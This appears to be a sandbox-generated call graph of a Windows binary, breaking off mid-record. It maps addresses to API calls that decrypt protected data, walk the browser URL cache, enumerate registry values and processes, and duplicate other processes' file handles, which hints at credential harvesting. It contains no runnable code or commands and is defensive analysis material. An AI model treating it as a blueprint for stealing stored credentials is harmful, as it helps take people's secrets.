40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 wcsncmp 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab free free 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab free free 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 39123 409b98 GetFileAttributesW 38533->39123 38536 408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 free 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf free 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab free free 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab free free 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 free 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 free 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab free free 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 free 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab free free 38880->38932 38881->38880 38883 40b633 free 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX free 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 free 38923->38925 38926 40aa04 free 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab free free 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39123->38537 39124->38538 39125->38542 39126->38544 39127->38547 39128->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235 44469e 39235->39231 39466 443d90 110 API calls 39235->39466 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39456 416935 16 API calls 39241->39456 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 39256->39258 39457 416935 16 API calls 39257->39457 39458 43302c memset 39258->39458 39260 4445fa 39459 43302c memset 39260->39459 39263 444609 39263->39273 39460 416935 16 API calls 39263->39460 39265 444646 39461 434d4b 17 API calls 39265->39461 39267 44464d 39462 437655 16 API calls 39267->39462 39269 444653 39463 4442e6 11 API calls 39269->39463 39271 44465d 39271->39273 39464 416935 16 API calls 39271->39464 39465 4442e6 11 API calls 39273->39465 39504 438460 39274->39504 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39601 424f07 11 API calls 39280->39601 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39603 4250f8 39283->39603 39602 4446ea 11 API calls 39284->39602 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39611 4384e9 134 API calls 39288->39611 39612 424f74 123 API calls 39288->39612 39291->39295 39613 424ff0 13 API calls 39291->39613 39294->39288 39615 415c7d 16 API calls 39295->39615 39296 425266 39296->39295 39614 415be9 memcpy 39296->39614 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 free 39322->39323 39324 40cf14 39323->39324 39350 40b1ab free free 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 free 39331->39332 39333 40cc15 39332->39333 39334 40aa04 free 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab free free 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 40cef5 39355 40aa04 free 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 